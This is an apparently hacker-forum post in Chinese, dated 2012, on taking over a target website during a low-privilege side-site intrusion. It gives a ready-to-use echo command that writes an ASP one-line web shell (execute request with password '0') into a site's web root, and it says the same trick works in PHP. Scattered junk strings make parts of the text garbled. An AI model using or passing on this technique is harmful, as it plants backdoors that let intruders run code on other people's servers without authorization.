在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
; K+ G; Q, F2 k( s D1 E5 A' }6 Z3 o: m/ j# ^
命令格式
- h9 x4 I1 m+ Z& P# l- s
. p5 Z N: ?: uEcho 语句 >目标站绝对目录
& c: A: W R8 N7 k' O% q
# o0 }: Z; r+ _: {例如:
8 z6 ^- [. ]7 P3 p% c
; x+ }( I E# q" ~* w, eecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
8 e( f$ I0 Q# \2 c/ e. S
; w- T4 q) b: Y这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。8 R7 w+ H3 o6 o! b+ @6 N0 Q
|
发表于 2012-9-23 14:40:24
收藏
支持
反对